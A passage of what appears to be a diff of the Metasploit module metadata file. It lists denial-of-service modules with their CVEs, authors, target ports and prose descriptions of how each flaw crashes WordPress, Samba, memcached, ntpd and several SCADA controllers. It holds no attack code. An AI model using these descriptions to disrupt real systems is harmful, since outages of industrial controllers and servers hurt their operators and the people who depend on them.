Sonatype Security Research" + ], + "description": "This module exploits a Regular Expression Denial of Service vulnerability\n in the npm module \"ua-parser-js\". Server-side applications that use\n \"ua-parser-js\" for parsing the browser user-agent string will be vulnerable\n if they call the \"getOS\" or \"getResult\" functions. This vulnerability was\n fixed as of version 0.7.16.", + "references": [ + "CVE-2017-16086", + "URL-https://github.com/faisalman/ua-parser-js/commit/25e143ee7caba78c6405a57d1d06b19c1e8e2f79", + "CWE-400" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2018-07-12 17:34:52 +0000", + "path": "/modules/auxiliary/dos/http/ua_parser_js_redos.rb", + "is_install_path": true, + "ref_name": "dos/http/ua_parser_js_redos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/webkitplus": { + "name": "WebKitGTK+ WebKitFaviconDatabase DoS", + "fullname": "auxiliary/dos/http/webkitplus", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-06-03", + "type": "auxiliary", + "author": [ + "Dhiraj Mishra", + "Hardik Mehta", + "Zubin Devnani", + "Manuel Caballero" + ], + "description": "This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset.\n If successful, it could lead to application crash, resulting in denial of service.", + "references": [ + "EDB-44842", + "CVE-2018-11646", + "URL-https://bugs.webkit.org/show_bug.cgi?id=186164", + "URL-https://www.inputzero.io/2018/06/cve-2018-11646-webkit.html" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/http/webkitplus.rb", + "is_install_path": true, + "ref_name": "dos/http/webkitplus", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "WebServer", + "description": "Serve exploit via web server" + } + ] + }, + "auxiliary_dos/http/webrick_regex": { + "name": "Ruby WEBrick::HTTP::DefaultFileHandler DoS", + "fullname": "auxiliary/dos/http/webrick_regex", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-08-08", + "type": "auxiliary", + "author": [ + "kris katterjohn " + ], + "description": "The WEBrick::HTTP::DefaultFileHandler in WEBrick in\n Ruby 1.8.5 and earlier, 1.8.6 to 1.8.6-p286, 1.8.7\n to 1.8.7-p71, and 1.9 to r18423 allows for a DoS\n (CPU consumption) via a crafted HTTP request.", + "references": [ + "BID-30644", + "CVE-2008-3656", + "OSVDB-47471", + "URL-http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/http/webrick_regex.rb", + "is_install_path": true, + "ref_name": "dos/http/webrick_regex", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/wordpress_directory_traversal_dos": { + "name": "WordPress Traversal Directory DoS", + "fullname": "auxiliary/dos/http/wordpress_directory_traversal_dos", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Yorick Koster", + "CryptisStudents" + ], + "description": "Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin\n function in wp-admin/includes/ajax-actions.php in WordPress before 4.6\n allows remote attackers to hijack the authentication of subscribers\n for /dev/random read operations by leveraging a late call to\n the check_ajax_referer function, a related issue to CVE-2016-6896.", + "references": [ + "CVE-2016-6897", + "EDB-40288", + "OVE-OVE-20160712-0036" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-03-22 12:52:15 +0000", + "path": "/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.rb", + "is_install_path": true, + "ref_name": "dos/http/wordpress_directory_traversal_dos", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/wordpress_long_password_dos": { + "name": "WordPress Long Password DoS", + "fullname": "auxiliary/dos/http/wordpress_long_password_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-11-20", + "type": "auxiliary", + "author": [ + "Javier Nieto Arevalo", + "Andres Rojas Guerrero", + "rastating" + ], + "description": "WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x\n before 4.0.1 allows remote attackers to cause a denial of service\n (CPU consumption) via a long password that is improperly handled\n during hashing.", + "references": [ + "CVE-2014-9016", + "URL-https://nvd.nist.gov/vuln/detail/CVE-2014-9034", + "OSVDB-114857", + "WPVDB-7681" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/http/wordpress_long_password_dos.rb", + "is_install_path": true, + "ref_name": "dos/http/wordpress_long_password_dos", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/wordpress_xmlrpc_dos": { + "name": "Wordpress XMLRPC DoS", + "fullname": "auxiliary/dos/http/wordpress_xmlrpc_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-08-06", + "type": "auxiliary", + "author": [ + "Nir Goldshlager", + "Christian Mehlmauer " + ], + "description": "Wordpress XMLRPC parsing is vulnerable to a XML based denial of service.\n This vulnerability affects Wordpress 3.5 - 3.9.2 (3.8.4 and 3.7.4 are\n also patched).", + "references": [ + "CVE-2014-5266", + "URL-https://wordpress.org/news/2014/08/wordpress-3-9-2/", + "URL-http://www.breaksec.com/?p=6362", + "URL-https://mashable.com/archive/wordpress-xml-blowup-dos", + "URL-https://core.trac.wordpress.org/changeset/29404", + "WPVDB-7526" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb", + "is_install_path": true, + "ref_name": "dos/http/wordpress_xmlrpc_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/ws_dos": { + "name": "ws - Denial of Service", + "fullname": "auxiliary/dos/http/ws_dos", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Ryan Knell, Sonatype Security Research", + "Nick Starke, Sonatype Security Research" + ], + "description": "This module exploits a Denial of Service vulnerability in npm module \"ws\".\n By sending a specially crafted value of the Sec-WebSocket-Extensions header on the initial WebSocket upgrade request, the ws component will crash.", + "references": [ + "URL-https://nodesecurity.io/advisories/550", + "CWE-400" + ], + "platform": "", + "arch": "", + "rport": 3000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/dos/http/ws_dos.rb", + "is_install_path": true, + "ref_name": "dos/http/ws_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/mdns/avahi_portzero": { + "name": "Avahi Source Port 0 DoS", + "fullname": "auxiliary/dos/mdns/avahi_portzero", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-11-14", + "type": "auxiliary", + "author": [ + "kris katterjohn " + ], + "description": "Avahi-daemon versions prior to 0.6.24 can be DoS'd\n with an mDNS packet with a source port of 0.", + "references": [ + "CVE-2008-5081", + "OSVDB-50929" + ], + "platform": "", + "arch": "", + "rport": 5353, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/dos/mdns/avahi_portzero.rb", + "is_install_path": true, + "ref_name": "dos/mdns/avahi_portzero", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/mirageos/qubes_mirage_firewall_dos": { + "name": "Mirage firewall for QubesOS 0.8.0-0.8.3 Denial of Service (DoS) Exploit", + "fullname": "auxiliary/dos/mirageos/qubes_mirage_firewall_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2022-12-04", + "type": "auxiliary", + "author": [ + "Krzysztof Burghardt " + ], + "description": "This module allows remote attackers to cause a denial of service (DoS)\n in Mirage firewall for QubesOS 0.8.0-0.8.3 via a specifically crafted UDP request.", + "references": [ + "CVE-2022-46770", + "URL-https://mirage.io/blog/MSA03", + "URL-https://github.com/mirage/qubes-mirage-firewall/issues/166" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2023-02-05 12:04:59 +0000", + "path": "/modules/auxiliary/dos/mirageos/qubes_mirage_firewall_dos.rb", + "is_install_path": true, + "ref_name": "dos/mirageos/qubes_mirage_firewall_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/misc/dopewars": { + "name": "Dopewars Denial of Service", + "fullname": "auxiliary/dos/misc/dopewars", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-10-05", + "type": "auxiliary", + "author": [ + "Doug Prostko " + ], + "description": "The jet command in Dopewars 1.5.12 is vulnerable to a segmentation fault due to\n a lack of input validation.", + "references": [ + "CVE-2009-3591", + "OSVDB-58884", + "BID-36606" + ], + "platform": "", + "arch": "", + "rport": 7902, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/misc/dopewars.rb", + "is_install_path": true, + "ref_name": "dos/misc/dopewars", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/misc/ibm_sametime_webplayer_dos": { + "name": "IBM Lotus Sametime WebPlayer DoS", + "fullname": "auxiliary/dos/misc/ibm_sametime_webplayer_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-11-07", + "type": "auxiliary", + "author": [ + "Chris John Riley", + "kicks4kittens" + ], + "description": "This module exploits a known flaw in the IBM Lotus Sametime WebPlayer\n version 8.5.2.1392 (and prior) to cause a denial of service condition\n against specific users. For this module to function the target user\n must be actively logged into the IBM Lotus Sametime server and have\n the Sametime Audio Visual browser plug-in (WebPlayer) loaded as a\n browser extension. The user should have the WebPlayer plug-in active\n (i.e. be in a Sametime Audio/Video meeting for this DoS to work correctly.", + "references": [ + "CVE-2013-3986", + "OSVDB-99552", + "BID-63611", + "URL-http://www-01.ibm.com/support/docview.wss?uid=swg21654041", + "URL-http://xforce.iss.net/xforce/xfdb/84969" + ], + "platform": "", + "arch": "", + "rport": 5060, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb", + "is_install_path": true, + "ref_name": "dos/misc/ibm_sametime_webplayer_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "CHECK", + "description": "Checking if targeted user is online" + }, + { + "name": "DOS", + "description": "Cause a Denial Of Service condition against a connected user" + } + ] + }, + "auxiliary_dos/misc/ibm_tsm_dos": { + "name": "IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service", + "fullname": "auxiliary/dos/misc/ibm_tsm_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-12-15", + "type": "auxiliary", + "author": [ + "Gianni Gnesa", + "William Webb " + ], + "description": "This module exploits a denial of service condition present in IBM Tivoli Storage Manager\n FastBack Server when dealing with packets triggering the opcode 0x534 handler.", + "references": [ + "EDB-38979", + "OSVDB-132307" + ], + "platform": "", + "arch": "", + "rport": 11460, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/misc/ibm_tsm_dos.rb", + "is_install_path": true, + "ref_name": "dos/misc/ibm_tsm_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/misc/memcached": { + "name": "Memcached Remote Denial of Service", + "fullname": "auxiliary/dos/misc/memcached", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Gregory Man " + ], + "description": "This module sends a specially-crafted packet to cause a\n segmentation fault in memcached v1.4.15 or earlier versions.", + "references": [ + "URL-https://code.google.com/archive/p/memcached/issues/192", + "CVE-2011-4971", + "OSVDB-92867" + ], + "platform": "", + "arch": "", + "rport": 11211, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/misc/memcached.rb", + "is_install_path": true, + "ref_name": "dos/misc/memcached", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/ntp/ntpd_reserved_dos": { + "name": "NTP.org ntpd Reserved Mode Denial of Service", + "fullname": "auxiliary/dos/ntp/ntpd_reserved_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-10-04", + "type": "auxiliary", + "author": [ + "todb " + ], + "description": "This module exploits a denial of service vulnerability\n within the NTP (network time protocol) demon. By sending\n a single packet to a vulnerable ntpd server (Victim A),\n spoofed from the IP address of another vulnerable ntpd server\n (Victim B), both victims will enter an infinite response loop.\n Note, unless you control the spoofed source host or the real\n remote host(s), you will not be able to halt the DoS condition\n once begun!", + "references": [ + "BID-37255", + "CVE-2009-3563", + "OSVDB-60847", + "URL-https://bugs.ntp.org/show_bug.cgi?id=1331" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb", + "is_install_path": true, + "ref_name": "dos/ntp/ntpd_reserved_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/pptp/ms02_063_pptp_dos": { + "name": "MS02-063 PPTP Malformed Control Data Kernel Denial of Service", + "fullname": "auxiliary/dos/pptp/ms02_063_pptp_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2002-09-26", + "type": "auxiliary", + "author": [ + "aushack " + ], + "description": "This module exploits a kernel based overflow when sending abnormal PPTP Control Data\n packets\tto Microsoft Windows 2000 SP0-3 and XP SP0-1 based PPTP RAS servers\n (Remote Access Services). Kernel memory is overwritten resulting in a BSOD.\n Code execution may be possible however this module is only a DoS.", + "references": [ + "BID-5807", + "CVE-2002-1214", + "OSVDB-13422", + "MSB-MS02-063" + ], + "platform": "", + "arch": "", + "rport": 1723, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb", + "is_install_path": true, + "ref_name": "dos/pptp/ms02_063_pptp_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/rpc/rpcbomb": { + "name": "RPC DoS targeting *nix rpcbind/libtirpc", + "fullname": "auxiliary/dos/rpc/rpcbomb", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "guidovranken", + "Pearce Barry " + ], + "description": "This module exploits a vulnerability in certain versions of\n rpcbind, LIBTIRPC, and NTIRPC, allowing an attacker to trigger\n large (and never freed) memory allocations for XDR strings on\n the target.", + "references": [ + "CVE-2017-8779", + "BID-98325", + "URL-http://openwall.com/lists/oss-security/2017/05/03/12" + ], + "platform": "", + "arch": "", + "rport": 111, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/dos/rpc/rpcbomb.rb", + "is_install_path": true, + "ref_name": "dos/rpc/rpcbomb", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/samba/lsa_addprivs_heap": { + "name": "Samba lsa_io_privilege_set Heap Overflow", + "fullname": "auxiliary/dos/samba/lsa_addprivs_heap", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module triggers a heap overflow in the LSA RPC service\n of the Samba daemon.", + "references": [ + "CVE-2007-2446", + "OSVDB-34699" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb", + "is_install_path": true, + "ref_name": "dos/samba/lsa_addprivs_heap", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/samba/lsa_transnames_heap": { + "name": "Samba lsa_io_trans_names Heap Overflow", + "fullname": "auxiliary/dos/samba/lsa_transnames_heap", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module triggers a heap overflow in the LSA RPC service\n of the Samba daemon.", + "references": [ + "CVE-2007-2446", + "OSVDB-34699" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/dos/samba/lsa_transnames_heap.rb", + "is_install_path": true, + "ref_name": "dos/samba/lsa_transnames_heap", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/samba/read_nttrans_ea_list": { + "name": "Samba read_nttrans_ea_list Integer Overflow", + "fullname": "auxiliary/dos/samba/read_nttrans_ea_list", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Jeremy Allison", + "dz_lnly" + ], + "description": "Integer overflow in the read_nttrans_ea_list function in nttrans.c in\n smbd in Samba 3.x before 3.5.22, 3.6.x before 3.6.17, and 4.x before\n 4.0.8 allows remote attackers to cause a denial of service (memory\n consumption) via a malformed packet. Important Note: in order to work,\n the \"ea support\" option on the target share must be enabled.", + "references": [ + "OSVDB-95969", + "BID-61597", + "EDB-27778", + "CVE-2013-4124" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2021-01-28 10:35:25 +0000", + "path": "/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb", + "is_install_path": true, + "ref_name": "dos/samba/read_nttrans_ea_list", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/sap/sap_soap_rfc_eps_delete_file": { + "name": "SAP SOAP EPS_DELETE_FILE File Deletion", + "fullname": "auxiliary/dos/sap/sap_soap_rfc_eps_delete_file", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Alexey Sintsov", + "nmonkee" + ], + "description": "This module abuses the SAP NetWeaver EPS_DELETE_FILE function, on the SAP SOAP\n RFC Service, to delete arbitrary files on the remote file system. The module can\n also be used to capture SMB hashes by using a fake SMB share as DIRNAME.", + "references": [ + "OSVDB-74780", + "URL-http://dsecrg.com/pages/vul/show.php?id=331", + "URL-https://launchpad.support.sap.com/#/notes/1554030" + ], + "platform": "", + "arch": "", + "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb", + "is_install_path": true, + "ref_name": "dos/sap/sap_soap_rfc_eps_delete_file", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/scada/allen_bradley_pccc": { + "name": "DoS Exploitation of Allen-Bradley's Legacy Protocol (PCCC)", + "fullname": "auxiliary/dos/scada/allen_bradley_pccc", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "José Diogo Monteiro ", + "Luis Rosa ", + "Miguel Borges de Freitas " + ], + "description": "A remote, unauthenticated attacker could send a single, specially crafted\n Programmable Controller Communication Commands (PCCC) packet to the controller\n that could potentially cause the controller to enter a DoS condition.\n MicroLogix 1100 controllers are affected: 1763-L16BWA, 1763-L16AWA, 1763-L16BBB, and\n 1763-L16DWD.\n CVE-2017-7924 has been assigned to this vulnerability.\n A CVSS v3 base score of 7.5 has been assigned.", + "references": [ + "CVE-2017-7924", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-17-138-03", + "URL-http://web.archive.org/web/20250116210051/https://dl.acm.org/doi/10.1145/3174776.3174780" + ], + "platform": "", + "arch": "", + "rport": 44818, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/dos/scada/allen_bradley_pccc.rb", + "is_install_path": true, + "ref_name": "dos/scada/allen_bradley_pccc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/scada/beckhoff_twincat": { + "name": "Beckhoff TwinCAT SCADA PLC 2.11.0.2004 DoS", + "fullname": "auxiliary/dos/scada/beckhoff_twincat", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-09-13", + "type": "auxiliary", + "author": [ + "Luigi Auriemma", + "jfa" + ], + "description": "The Beckhoff TwinCAT version <= 2.11.0.2004 can be brought down by sending\n a crafted UDP packet to port 48899 (TCATSysSrv.exe).", + "references": [ + "CVE-2011-3486", + "OSVDB-75495", + "URL-http://aluigi.altervista.org/adv/twincat_1-adv.txt" + ], + "platform": "", + "arch": "", + "rport": 48899, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/scada/beckhoff_twincat.rb", + "is_install_path": true, + "ref_name": "dos/scada/beckhoff_twincat", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/scada/d20_tftp_overflow": { + "name": "General Electric D20ME TFTP Server Buffer Overflow DoS", + "fullname": "auxiliary/dos/scada/d20_tftp_overflow", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-01-19", + "type": "auxiliary", + "author": [ + "K. Reid Wightman ", + "todb " + ], + "description": "By sending a malformed TFTP request to the GE D20ME, it is possible to crash the\n device.\n\n This module is based on the original 'd20ftpbo.rb' Basecamp module from\n DigitalBond.", + "references": [ + "URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/" + ], + "platform": "", + "arch": "", + "rport": 69, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2021-01-28 10:35:25 +0000", + "path": "/modules/auxiliary/dos/scada/d20_tftp_overflow.rb", + "is_install_path": true, + "ref_name": "dos/scada/d20_tftp_overflow", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/scada/igss9_dataserver": { + "name": "7-Technologies IGSS 9 IGSSdataServer.exe DoS", + "fullname": "auxiliary/dos/scada/igss9_dataserver", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-12-20", + "type": "auxiliary", + "author": [ + "jfa" + ], + "description": "The 7-Technologies SCADA IGSS Data Server (IGSSdataServer.exe) <= 9.0.0.10306 can be\n brought down by sending a crafted TCP packet to port 12401. This should also work\n for version <= 9.0.0.1120, but that version hasn't been tested.", + "references": [ + "CVE-2011-4050", + "OSVDB-77976", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-335-01" + ], + "platform": "", + "arch": "", + "rport": 12401, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/scada/igss9_dataserver.rb", + "is_install_path": true, + "ref_name": "dos/scada/igss9_dataserver", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/scada/siemens_siprotec4": { + "name": "Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module - Denial of Service", + "fullname": "auxiliary/dos/scada/siemens_siprotec4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "M. Can Kurnaz" + ], + "description": "This module sends a specially crafted packet to port 50000/UDP\n causing a denial of service of the affected (Siemens SIPROTEC 4 and SIPROTEC Compact < V4.25) devices.\n A manual reboot is required to return the device to service.\n CVE-2015-5374 and a CVSS v2 base score of 7.8 have been assigned to this vulnerability.", + "references": [ + "EDB-44103", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-15-202-01" + ], + "platform": "", + "arch": "", + "rport": 50000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/scada/siemens_siprotec4.rb", + "is_install_path": true, + "ref_name": "dos/scada/siemens_siprotec4", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/scada/yokogawa_logsvr": { + "name": "Yokogawa CENTUM CS 3000 BKCLogSvr.exe Heap Buffer Overflow", + "fullname": "auxiliary/dos/scada/yokogawa_logsvr", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-03-10", + "type": "auxiliary", + "author": [ + "juan vazquez ", + "Redsadic " + ], + "description": "This module abuses a buffer overflow vulnerability to trigger a Denial of Service\n of the BKCLogSvr component in the Yokogaca CENTUM CS 3000 product. The vulnerability\n exists in the handling of malformed log packets, with an unexpected long level field.\n The root cause of the vulnerability is a combination of usage of uninitialized memory\n from the stack and a dangerous string copy. This module has been tested successfully\n on Yokogawa CENTUM CS 3000 R3.08.50.", + "references": [ + "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf", + "URL-http://web.archive.org/web/20221209030848/https://www.rapid7.com/blog/post/2014/03/10/yokogawa-centum-cs3000-vulnerabilities/", + "CVE-2014-0781" + ], + "platform": "", + "arch": "", + "rport": 52302, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/dos/scada/yokogawa_logsvr.rb", + "is_install_path": true, + "ref_name": "dos/scada/yokogawa_logsvr", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/smb/smb_loris": { + "name": "SMBLoris NBSS Denial of Service", + "fullname": "auxiliary/dos/smb/smb_loris", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-06-29", + "type": "auxiliary", + "author": [ + "thelightcosine", + "Adam Cammack " + ], + "description": "The SMBLoris attack consumes large chunks of memory in the target by sending\n SMB requests with the NetBios Session Service(NBSS) Length Header value set\n to the maximum possible value. By keeping these connections open and initiating\n large numbers of these sessions, the memory does not get freed, and the server\n grinds to a halt. This vulnerability was originally disclosed by Sean Dillon\n and Zach Harding.\n\n DISCALIMER: This module opens a lot of simultaneous connections. Please check\n your system's ULIMIT to make sure it can handle it. This module will also run\n continuously until stopped.", + "references": [ + "URL-https://web.archive.org/web/20170804072329/https://smbloris.com/", + "AKA-SMBLoris" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/smb/smb_loris.rb", + "is_install_path": true, + "ref_name": "dos/smb/smb_loris", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/smtp/sendmail_prescan": { + "name": "Sendmail SMTP Address prescan Memory Corruption", + "fullname": 